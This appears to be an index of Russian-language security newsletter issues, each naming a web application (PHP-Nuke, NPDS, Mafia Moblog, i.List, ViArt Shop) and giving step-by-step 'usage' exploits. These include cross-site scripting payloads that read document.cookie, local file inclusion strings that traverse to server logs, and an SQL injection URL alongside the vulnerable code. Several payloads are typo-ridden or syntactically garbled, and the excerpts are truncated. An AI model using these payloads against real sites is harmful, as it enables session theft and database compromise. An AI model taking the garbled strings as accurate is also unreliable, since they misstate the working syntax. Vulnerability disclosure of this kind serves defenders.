Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в PHP-Nuke.
Компьютер для продвинутых пользователей В этом выпуске: PHP-Nuke ПО: PHP-Nuke Версия: 7.9 Использование: 1. Введите: http://[host]/modules.php?name=Search 2. В поиске: "><body onload"alert(document.cookie) Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в NPDS.
Компьютер для продвинутых пользователей В этом выпуске: NPDS ПО: NPDS Версия: 5.10 Сайт: www.npds.org Использование: http://]/header.php?Default_Theme./apache/logs/error.log%00 http://]/modules/cluster-paradise/cluster-E.php?ModPath./././././apache/logs/error.log%00 // http://]/header.php?Titlesitename=<script>alert(document.cookie)</script> http://]/header.php?sitename><script>alert(document.cookie)</script> http://]/meta/meta.php?nuke_url><script>alert(document.cookie)</script> http://]...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Mafia Moblog.
Компьютер для продвинутых пользователей В этом выпуске: Mafia Moblog ПО: Mafia Moblog Версия: 6 Уязвимость: Введите в параметр 'img' на "big,php" не проверяется до использования в SQL-запросе. Это может быль использоваться для проведения SQL-запросов. Уязвимый код в 'templates/match plus/big.php' : * 52 $query = "SELECT * FROM $table WHERE id$img"; 53 $result = mysql_query$query); 54 $row = mysql_fetch_row$result); * Использование: http://localhost//moblog/big.php?img[SQL]...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в i.List.
Компьютер для продвинутых пользователей В этом выпуске: i.List ПО: i.List Версия: 1.5 Сайт: http://skoom.de Уязвимость: Ввод в поле текста 'URL' в файл "search.php" и 'ButtonURL' в "add.php не проверяется и не фильтруется до использования. Это позволяет провести XSS атаку на сервер. Использование: В любое поле вставьте код: <script>alert"MajorSecurity)</script. Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 27...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в ViArt Shop.
Компьютер для продвинутых пользователей В этом выпуске: ViArt Shop ПО: ViArt Shop Версия: 2.5.5 Сайт: http://www.codetosell.com/ Использование: /forum.php?forum_id><script>alert'XSS);</script>&category_id=1 /reviews.php?category_id=0&item_id=4&rnd=1149618267&action=1&item_id><scri pt>alert'XSS);</script>...